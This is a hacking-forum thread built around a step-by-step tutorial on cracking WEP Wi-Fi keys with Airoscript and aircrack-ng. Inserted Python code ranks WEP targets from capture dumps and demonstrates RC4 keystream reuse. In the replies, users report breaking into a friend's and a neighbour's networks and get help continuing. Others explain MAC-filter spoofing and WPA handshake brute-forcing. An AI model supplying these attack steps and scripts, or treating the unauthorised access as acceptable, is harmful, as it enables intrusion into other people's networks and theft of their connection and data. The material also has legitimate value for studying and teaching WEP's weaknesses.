EvilZone

Hacking and Security => Tutorials => : iTpHo3NiX November 26, 2010, 06:35:30 AM

: Hacking WEP with Backtrack4 Final and Airoscript
: iTpHo3NiX November 26, 2010, 06:35:30 AM
///////////////////////////////////////////////////////////////////////////////////////
Title: Hacking WEP with Backtrack4 Final and Airoscript
Paper by: iTpHo3NiX
///////////////////////////////////////////////////////////////////////////////////////

NOTE
When cracking the network from the screenshots, I had permission from my neighbor to pen test their wireless encryption and to write this paper. It is illegal to hack wireless networks without permission; however, if you would like to help secure your neighbor's network (as I did, helping him set up a MAC filter with WPA2 encryption afterwards), then take a look and show them this. Hopefully this will also educate you in wireless security.

Method
The simplest way (and a good way to show potential customers how easy it is to actually hack their wireless networks) to hack a WEP-encrypted network is using Backtrack4 Final with Airoscript. Airoscript utilizes the aircrack-ng suite to automate WEP/WPA hacking (although for WPA the best thing to do is use it to capture the handshake file, go offsite and use John the Ripper to bruteforce it, or cowpatty to run a dictionary attack against the handshake file).

Devices Used

Hint
With the final release of Backtrack4 there seems to be a (very slight) error with Airoscript that requires you to navigate to the tmp directory after the scan and change the extension of dump-01.csv to dump-01.txt for Airoscript to recognize the dump file and let you select which network you would like to attack.

The Process

Step One
Open the KDE Start Menu (after loading the desktop using startx) and navigate to "Backtrack-->Radio Network Analysis-->80211-->Cracking-->Airoscript".

(http://i51.tinypic.com/feq8op.jpg)

Step Two
Select your screen resolution (I chose 4)

Step Three
Select your wireless device. In most cases it's wlan0; however, since I'm using my Linksys WUSB54GC, it's going to be wlan1. When prompted to put the device into monitor mode, select "y" for yes.

(http://i56.tinypic.com/2lmt9qr.jpg)

Step Four
Now you are at the main Airoscript page where you select your options. Normally option 9, which goes through the first three steps automatically, does not work out of the box with the final live CD (unless you update to the latest Airoscript and the latest aircrack-ng suite), so we are going to go through the steps manually (it is still just as simple). So let's select option 1 to scan.

(http://i56.tinypic.com/1zdryih.jpg)

Step Five
The next page asks you if you would like to apply a filter. Since this is a paper on WEP cracking, I am going to select a filter for WEP (option 3), then select whether you want it to scan on a specific channel or to scan all channels (via channel hopping, option 1).

(http://i56.tinypic.com/102kpiw.jpg)

This will open up a new window that is now scanning for targets.

(http://i52.tinypic.com/30aqo0j.jpg)

Step Six
Once you've picked up a few networks and have a target you would like to attack (note the BSSID and the ESSID when there are multiple options, so you go after the proper network), close the scanning window. Now, as I stated before, unless you have an updated Airoscript/aircrack-ng you will need to go to the temp folder and rename dump-01.csv to dump-01.txt. To do this, simply open Konqueror (right next to the KDE start menu) and click on "Home Folder" (you will be in /root). Go up one folder to /, go into the tmp folder, then into the tmp.RANDOMCHARACTERS folder, right-click on dump-01.csv and click Rename, then change the extension so it reads dump-01.txt. You can now close Konqueror and continue with Airoscript.

Step Seven
Now we select option 2 to select our target. You get a numbered list from which to select the network you would like to attack.

(http://i55.tinypic.com/a3jk0o.jpg)

Step Eight
Now I choose option 1 to select the associated client.

(http://i53.tinypic.com/2vk0yva.jpg)

Step Nine
Now we go for the attack, so choose option 3. This can vary for everyone; I personally choose option 1, which is a fake authorization without user input (no need to select packets, a more automated attack).

(http://i56.tinypic.com/fo3vrq.jpg)

This will open up the following windows:

(http://i54.tinypic.com/qpicep.jpg)

I also like to run another attack at the same time, so select option 3 again; this time I choose option 7, which is an ARP replay. It is again automatic, so no user interaction is needed.

Now it's a waiting game, and you will have a window like this:

(http://i56.tinypic.com/24m9n5k.jpg)

This is just personal preference: you can start the cracking as soon as you get at least 1 ACK, but I like to wait until I have at least 100,000+ ACKs (usually 200,000+).

Step 10
Now it's time for the actual cracking (option 4). Select option 4, then option 1 on the following screen for a PTW crack, and soon you will have the WEP encryption key, like this:

(http://i55.tinypic.com/f2vnr5.jpg)

Tutorial by iTpHo3NiX of EvilZone.org. This is for educational purposes ONLY and is not to be abused. Hopefully this will persuade people to change their wireless configuration to run a MAC filter with WPA2, so that their internet is not stolen.
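Steps 5 through 8 above are Airoscript reading the airodump-ng dump file (the dump-01.csv that has to be renamed on BackTrack 4 Final) and presenting the WEP networks and their associated clients as numbered menus. The Python below is an added example for this thread, not part of the original tutorial and not Airoscript's or aircrack-ng's code: it parses that CSV layout (AP table, blank line, station table, as airodump-ng writes it) and ranks WEP targets by associated clients and captured IVs. The dump contents are constructed for the example.

```python
"""Parse an airodump-ng CSV dump and pick WEP targets with associated clients.

Added example for this thread: not part of the original post and not
airoscript/aircrack-ng code. The column layout is the one airodump-ng writes
to dump-NN.csv (AP table, blank line, station table); the dump below is
constructed for the example.
"""
import csv
import io

# Constructed sample dump: two WEP networks, one WPA2 network, two stations.
SAMPLE_DUMP = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-11-26 06:10:01, 2010-11-26 06:15:30,  6,  54, WEP , WEP, OPN, -45,  120,  1532,   0.  0.  0.  0,   7, linksys,
66:77:88:99:AA:BB, 2010-11-26 06:10:03, 2010-11-26 06:15:30, 11,  54, WPA2, CCMP, PSK, -60,   80,     0,   0.  0.  0.  0,   6, secure,
CC:DD:EE:FF:00:11, 2010-11-26 06:10:09, 2010-11-26 06:15:28,  1,  54, WEP , WEP, OPN, -70,   40,    12,   0.  0.  0.  0,   5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2010-11-26 06:10:05, 2010-11-26 06:15:30, -50,  300, 00:11:22:33:44:55, linksys
AA:BB:CC:DD:EE:02, 2010-11-26 06:11:00, 2010-11-26 06:15:29, -55,   10, (not associated), secure,linksys
"""


def parse_airodump_csv(text):
    """Return (aps, stations): one dict per row, keyed by the header names."""
    aps, stations = [], []
    header = target = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:                         # the blank line separates the two tables
            header = None
            continue
        if header is None:                  # first row of each table is its header
            header = [h.strip() for h in row]
            target = stations if header[0] == "Station MAC" else aps
            continue
        fields = [f.strip() for f in row]
        # "Probed ESSIDs" may itself contain commas; fold the overflow back into the last column.
        if len(fields) > len(header):
            fields = fields[:len(header) - 1] + [",".join(fields[len(header) - 1:])]
        target.append(dict(zip(header, fields)))
    return aps, stations


def wep_targets(aps, stations):
    """WEP networks with their associated clients, best target first.

    This is the choice airoscript's "select target" / "select client" menus make
    for you. The client MACs are also what a MAC-filter bypass would spoof.
    """
    clients = {}
    for st in stations:
        clients.setdefault(st["BSSID"], []).append(st["Station MAC"])
    targets = []
    for ap in aps:
        if "WEP" not in ap["Privacy"].split():   # skips OPN, WPA and WPA2 networks
            continue
        targets.append({
            "bssid": ap["BSSID"],
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "ivs": int(ap["# IV"]),
            "clients": clients.get(ap["BSSID"], []),
        })
    # A network with a live client can be ARP-replayed; IVs already captured are a bonus.
    return sorted(targets, key=lambda t: (len(t["clients"]), t["ivs"]), reverse=True)


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_DUMP)
    for n, t in enumerate(wep_targets(aps, stations), 1):
        print(f"{n}) {t['bssid']} ch{t['channel']:>2} {t['essid']:<8} IVs={t['ivs']:<6} clients={t['clients']}")
```

A network with a station listed against its BSSID is the one to pick: the ARP-replay attack in step 9 needs a real client's ARP requests to replay, so a WEP network with no client is left to fake authentication alone. The station whose BSSID reads "(not associated)" is a client probing for networks it remembers, not a client of any AP in the table.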
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: shijinmrx January 15, 2011, 03:58:55 PM
I know it's illegal to hack into a network and use it without their permission,
but I hacked one of my friend's WEP networks; we had a bet for $50. The problem is that when I connect, it shows limited connectivity. When I looked at the status, the default gateway appears to be 0.0.0.0,
so I think it's not connected to the router (it also shows "unidentified network"). Please help me.
How do I find the IP address of the router? I have no way to access his computer or router.
I used BackTrack to find the WEP key.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: ande January 15, 2011, 04:23:28 PM

Tried the default ones? :P 10.0.0.1 | 192.168.0.1

If those don't work, do a range scan on 10.0. and 192.168. and you should get something.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: a12danrulz January 16, 2011, 11:20:43 PM
This is one HELL of a tut, man! Time to hack into my own wifi network. Quick question though: could this be done from VMware? I have mine set to share my laptop's network and it's never asked for a password, even though I'm getting Internet from it and it shows up when I scan. Would I have to disconnect my laptop from the network first?
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: FuyuKitsune January 17, 2011, 03:37:08 AM
It should work from a VM. I know that VirtualBox puts the NIC in monitor mode to create a virtual card, I'm not so sure how VMware does it.


Really nice tut. I should get that USB wifi adapter, my stupid card doesn't support monitor/promiscuous without finding some old Linux drivers.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: a12danrulz January 17, 2011, 03:12:55 PM
Yeah I meant virtualbox. I hate autocorrect sometimes.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: iTpHo3NiX January 18, 2011, 02:42:51 AM

http://www.newegg.com/Product/Product.aspx?Item=N82E16833124187&nm_mc=OTC-Froogle&cm_mmc=OTC-Froogle-_-Network+-+Wireless+Adapters-_-Linksys-_-33124187

;-) I love my card, works like a champ
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Ghat c0mrade2 March 01, 2011, 04:39:44 PM
You copy/pasted it.
Try to put the source next time ;)
http://myhackingway.blogspot.com/2011/02/hacking-wep-with-backtrack4-final-and.html

btw nice tut
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: ande March 01, 2011, 04:54:32 PM

I highly doubt that.

Hacking WEP with Backtrack4 Final and Airoscript
« on: November 26, 2010, 06:35:30 am »

Saturday, February 12, 2011
Hacking WEP with Backtrack4 Final and Airoscript
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: iTpHo3NiX March 01, 2011, 11:50:29 PM
Lol, I copied and pasted my own tut, lol. I even posted this on the OLD evilzone!

http://evilzone.org/archive/new/tutorials/hacking-wep-with-backtrack-4-final-and-airoscript/

Hacking WEP with Backtrack 4 Final and Airoscript
« on: March 31, 2010, 04:12:13 am »

I posted that almost a year ago. They copied and pasted off of me :P

So thank you, try again.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Satan911 March 02, 2011, 01:10:06 AM
I shall try it later today (if my BackTrack live USB still works). This is an easy tut.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: LucaBrassi June 19, 2011, 07:34:32 PM
Can anyone give an updated source to download Backtrack4 with Airoscript? The links don't work and I could not find it when I searched with Google.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Kulverstukas June 19, 2011, 07:51:17 PM
Use BackTrack5 instead. You can get it here: http://www.backtrack-linux.org/downloads/
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: noob June 20, 2011, 12:41:03 AM
Why not do it the easy way (Gerix is part of Backtrack 4-5):
(http://4.bp.blogspot.com/-DfJAgCGWeHo/TdqQAohtQiI/AAAAAAAAAME/HmCVwktdCR8/s1600/STEP%2B8.JPG)
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: ande June 20, 2011, 12:53:40 AM

Come on, don't encourage click n hack software. Its just gay
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Stackprotector June 20, 2011, 01:03:34 AM
mehehe, the cheat engine in the toolbar says enough ;)
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: noob June 20, 2011, 03:16:08 PM
@ande

Well, it's the best choice when your laptop battery is limited to 45 min and you must keep your laptop on Windows to hack your neighbour :)

But for whoever wants to know more about it, there is the Wireless LAN Security Megaprimer series on SecurityTube by Vivek ;)
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: noob June 20, 2011, 03:18:16 PM
Not my screen; type gerix into an image search :P
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Axalto September 25, 2011, 04:21:28 PM
Sorry for probably being an entire n00b, but I use BackTrack 5 and I can't find the tool.


[edit] Nevermind, found out how.


For those who wonder how:
1. Download Airoscript from the Airoscript Google site.
2. Navigate to where the .tar.gz is and use tar to unpack it.
3. Navigate (in a shell) to the unpacked folder and type "make".
Now you can type airoscript in the shell to start it.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: fl4sh January 10, 2012, 03:57:49 AM
Worked fine but, will this work on WPA and WPA2?
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Kulverstukas January 10, 2012, 07:28:23 AM
Cracking WPA is a whole different procedure, and very hard. Not to mention WPA2...
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: ande January 10, 2012, 02:37:12 PM
The only way of doing it is by brute force, iirc?
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Z3R0 January 10, 2012, 03:05:48 PM
I guess yeah, brute forcing is the only method. I don't think there are any crypto attacks on AES that are higher than 128-bit. I guess one could do a generic brute force (SSID + key). However, I've also heard of forcing the client to reinitiate its session, capturing the pre-shared key, and brute forcing that. I'm definitely not an expert on the subject, but I haven't really heard of anything other than brute-force methods, although I have heard of different vectors over which to brute force.

EDIT: This was in reference to cracking WPA/WPA2 networks.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: _moon January 12, 2012, 12:33:40 AM
aircrack-ng (http://www.aircrack-ng.org/) can crack WPA using a pre-shared key (PSK).

More information: http://www.aircrack-ng.org/doku.php?id=aircrack-ng
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: iAmLuFFy January 16, 2012, 08:52:22 AM
Only way doing it is by brute force iirc?

Doesn't a dictionary attack work sometimes...?
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: ande January 16, 2012, 02:23:26 PM
That would still be bruteforce
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: AnTiHer0 February 10, 2012, 05:38:22 AM

Doesn't a dictionary attack work sometimes...?

A dictionary attack won't work for most things. You are just hoping your prey is stupid enough to have a very basic password.

Also, for the whole MAC address security thing: not that secure. Pretty simple to get around, actually. You can sniff out MAC addresses on a wifi network, then spoof your own MAC address. However, most people won't do this, so it is a good step up.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: _otter_ February 18, 2012, 03:31:40 PM
Hmmmm, I really can't find the Airoscript link to download it... I use BackTrack 5 and I have aircrack, which is the same or even better than Airoscript, but the problem is that I can't find a good tutorial for it.
Or maybe I can, but my problem is that I can't turn off mon0!
Can someone help?
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Z3R0 February 20, 2012, 04:05:11 PM
Even though it would be infinitely easier for me to tell you the command, I cannot cope mentally with the idea of giving a handout for something like this. I'll point you in the right direction though. Look in the linux man-pages about how to use "ifconfig"

Just a side note to all the other new guys: learn how to use your respective operating systems before you attempt any kind of hacking. What good is having a bicycle if you don't know how to ride it? Same idea here. Also, Airoscript is fantastic. I'm an extremely huge fan of mdk3.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: _otter_ February 20, 2012, 10:33:41 PM
Ty very much ;)
I did everything you told me and now I can access my neighbor's WEP :)
I learn fast. Sorry for my maybe nooby question, but sometimes I really need help.

p.s. sorry for my bad English :-[
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: locolopez515 February 21, 2012, 01:58:49 AM
Is there a tutorial on this in video format? And what program should I download to do this? Any links will be appreciated. I know this is illegal; I'm not using it for the wrong purpose :D Please and thank you.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: PiZZ4 February 22, 2012, 06:17:25 AM
Crack WEP:
http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
Crack WPA:
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
Videos:
http://www.securitytube.net/
Videos are fun to watch, but reading about the subject, whether it be a book on cracking WEP passwords or an article about SQL injection, will help in your learning process. Take it from someone who's been there before.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: iTpHo3NiX April 26, 2012, 12:49:12 AM
Quote from ande:
Come on, don't encourage click n hack software. Its just gay
Airoscript is pretty much click n hack, just not click: just enter a few numbers and press enter :P

Yes there is Gerix as well as other GUI front-ends for aircrack-ng and I've used most of them, however I find airoscript easier to use as well as simple, yet effective.

Also for those of you who WANT airoscript its not that hard...

svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
It will download the latest aircrack-ng, as well as Airoscript, which is in the scripts directory; or just google...

http://code.google.com/p/airoscript/
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: Z3R0 April 26, 2012, 09:27:30 AM
As much as I agree with you on this, writing your own tools is not a simple task to undertake. I do think that, in the name of research, I would recommend someone use these tools to understand the attacks and how they work, and from there start writing their own code. As we all know, the aircrack suite as a whole actually takes some thought and planning to perform an attack. There are more noob-friendly tools for cracking WEP... for example, the ultimate tool in click n' hack softwarez: wesside-ng.
: Re: Hacking WEP with Backtrack4 Final and Airoscript
: iTpHo3NiX April 26, 2012, 06:07:57 PM
Wesside-ng is an auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes. It first identifies a network, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme, reinject ARP requests and finally determine the WEP key. All this is done without your intervention.

lol, you do have a point there :P But the GUIs, man, the GUIs!!

http://code.google.com/p/aircrackgui-m4/

lol, tbh I've never used a GUI for aircrack; ever since the BackTrack 3 beta I've used Airoscript, and back when I was using BackTrack 2 I did it manually.

HOWEVER, my intention when I wrote this paper (back in 2009-2010) was to show the vulnerabilities in WEP security. The point was to show that by pressing a few numbers, anyone can hack a WEP network, and then, once on the network, the damage that could be done. I do believe that people should know the commands of the aircrack suite, but honestly I haven't used it by itself in so long; all it takes is for me to run Airoscript.
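The ARP-replay step in the tutorial and the "PRGA xor data" that the wesside-ng description above says it obtains rest on the same WEP weakness: under a given 24-bit IV the RC4 keystream is fixed, every ARP request starts with the same known bytes, and IVs repeat on a busy network. The Python below is an added example for this thread, not from the original post and not aircrack-ng code: it implements WEP framing (IV, key index, RC4 over the data plus a CRC-32 ICV), recovers keystream from a captured ARP request without knowing the key, and uses it to read the start of another frame sent under the same IV. Key, IV and frames are constructed. The statistical PTW key recovery that aircrack-ng runs in step 10 is a separate attack and is not shown.

```python
"""WEP: recover RC4 keystream from a known-plaintext frame and reuse it.

Added example for this thread (not from the original post or aircrack-ng).
Key, IV and frames are constructed. Framing follows WEP:
  frame = IV(3) || key id(1) || RC4(IV || key, data || CRC-32 ICV)
"""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA XOR). WEP feeds it IV || WEP key as the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """What the station transmits: the IV in clear, then RC4 over data || ICV."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + b"\x00" + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """What the AP does with the real key, including the ICV check."""
    body = rc4(frame[:3] + key, frame[4:])
    data, icv = body[:-4], body[-4:]
    if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch")
    return data


def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> bytes:
    """Ciphertext XOR known plaintext = the keystream for this frame's IV; no key involved."""
    return bytes(c ^ p for c, p in zip(frame[4:], known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Strip as many bytes as we have keystream from any frame that reuses the same IV."""
    return bytes(c ^ k for c, k in zip(frame[4:], keystream))


# Constructed 104-bit key and IV. The prefix is what every ARP request carries inside
# WEP: LLC/SNAP header, ethertype 0x0806, then hardware/protocol type and lengths, opcode 1.
WEP_KEY = bytes.fromhex("0123456789abcdef0123456789")
IV = b"\x0c\xaf\xe0"
ARP_REQUEST_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")
ARP_REQUEST = ARP_REQUEST_PREFIX + bytes.fromhex(
    "aabbccddee01" "c0a80164" "000000000000" "c0a80101")   # sender MAC/IP, target MAC/IP
IP_FRAME = (bytes.fromhex("aaaa030000000800")               # LLC/SNAP, ethertype IPv4
            + bytes.fromhex("4500003c1c4640004006")         # start of an IPv4 header
            + b"constructed payload")


def demo() -> bytes:
    """Two frames under one IV: learn keystream from the ARP, read the other frame."""
    captured_arp = wep_encrypt(WEP_KEY, IV, ARP_REQUEST)
    captured_other = wep_encrypt(WEP_KEY, IV, IP_FRAME)      # same IV reused by the sender
    keystream = keystream_from_known_plaintext(captured_arp, ARP_REQUEST_PREFIX)
    return decrypt_with_keystream(captured_other, keystream)  # first 16 bytes, no key needed


if __name__ == "__main__":
    print(demo().hex())
```

The 16 recovered bytes are exactly the known part of the ARP; an attacker who can also guess the sender and target addresses (the network's IP scheme that wesside-ng determines) gets the full 40-byte keystream and can forge any frame of that length under that IV. The counter you wait on in step 9 is the number of data frames, and with them IVs, captured so far; ARP replay drives it up because every replayed request makes the AP emit a freshly encrypted reply, and those are what the PTW attack consumes. With only 2^24 IVs, and some cards restarting the IV sequence from zero on association, keystream reuse like this needs no statistics at all.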